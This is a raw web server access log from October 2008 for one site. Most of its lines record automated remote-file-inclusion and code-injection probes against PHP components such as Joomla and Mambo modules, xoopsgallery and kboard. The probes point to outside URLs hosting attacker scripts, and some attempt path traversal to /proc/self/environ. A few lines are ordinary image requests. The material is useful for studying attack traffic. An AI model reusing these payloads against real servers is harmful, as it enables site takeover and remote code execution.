98.136.50.138 - - [26/Oct/2008:10:30:25 -0700] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:30:28 -0700] "GET /logs/access_080918.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:30:28 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:30:29 -0700] "GET /logs/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:30:33 -0700] "GET /logs/access_080811.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:30:34 -0700] "GET /logs/access_080314.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:30:42 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:30:56 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:30:56 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:30:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.64.85 - - [26/Oct/2008:10:30:57 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:30:57 -0700] "GET /logs/access_080913.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:30:57 -0700] "GET /component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:30:57 -0700] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:07 -0700] "GET /logs/access_080918.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:08 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:08 -0700] "GET /logs/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:10 -0700] "GET /logs/access_080918.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:10 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:11 -0700] "GET /logs/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:31:13 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/049-2.jpg HTTP/1.1" 200 393060 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:19 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:20 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:20 -0700] "GET /logs/errors.php?error=http://www.guimp.com/???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
195.16.241.150 - - [26/Oct/2008:10:31:20 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.16.241.150 - - [26/Oct/2008:10:31:20 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.guimp.com/???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:21 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.16.241.150 - - [26/Oct/2008:10:31:21 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.guimp.com/???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
195.16.241.150 - - [26/Oct/2008:10:31:21 -0700] "GET /errors.php?error=http://www.guimp.com/???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
195.16.241.150 - - [26/Oct/2008:10:31:21 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.16.241.150 - - [26/Oct/2008:10:31:22 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:31:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-084_0.jpg HTTP/1.1" 200 404736 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:31:33 -0700] "GET /logs/access_080806.log//index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:35 -0700] "GET /index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 200 95514 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:37 -0700] "GET /logs//index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-148.jpg HTTP/1.1" 200 271866 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:31:40 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:41 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:41 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:48 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.241.229 - - [26/Oct/2008:10:31:48 -0700] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.241.229 - - [26/Oct/2008:10:31:49 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:49 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:31:49 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:31:49 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:49 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:31:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-099_1.jpg HTTP/1.1" 200 475970 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:31:50 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:31:50 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:31:50 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:31:56 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:31:56 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:31:56 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:31:58 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:32:24 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:32:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087_0.jpg HTTP/1.1" 200 272096 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:32:54 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:32:54 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:32:54 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:32:55 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:32:57 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://usadult.tv/fclick/common/data/.svn/idperkosa.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:32:58 -0700] "GET /logs/access_080918.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://usadult.tv/fclick/common/data/.svn/idperkosa.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:32:58 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://usadult.tv/fclick/common/data/.svn/idperkosa.txt%0D?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:32:59 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:33:03 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:33:03 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:33:03 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:33:03 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:33:04 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:33:04 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:33:35 -0700] "GET /logs/access_080526.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:33:36 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:33:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.32.200 - - [26/Oct/2008:10:33:46 -0700] "GET /logs//?_zb_path=http://www.metsastajanerikoisliike.fi/components/bot.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.54.32.200 - - [26/Oct/2008:10:33:47 -0700] "GET /?_zb_path=http://www.metsastajanerikoisliike.fi/components/bot.txt?? HTTP/1.1" 200 94908 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:33:50 -0700] "GET /logs/access_080905.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:33:50 -0700] "GET /logs/access_080714.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:33:56 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:34:12 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:34:23 -0700] "GET /logs/access_080918.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:34:23 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:34:23 -0700] "GET /logs/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:34:34 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:34:34 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:34:35 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:34:42 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:34:48 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:34:48 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:34:48 -0700] "GET /logs/access_081018.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:34:49 -0700] "GET /logs/access_080811.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:34:50 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:34:56 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:34:56 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:34:57 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:17 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:17 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:25 -0700] "GET /logs/access_080322.log/errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
195.242.236.15 - - [26/Oct/2008:10:35:25 -0700] "GET /errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
195.242.236.15 - - [26/Oct/2008:10:35:26 -0700] "GET /logs/errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:29 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/005-2.jpg HTTP/1.1" 200 334232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:33 -0700] "GET /logs/access_080912.log HTTP/1.0" 200 4637006 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:35:42 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:35:42 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:42 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:35:42 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:35:44 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:35:44 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:35:44 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:45 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
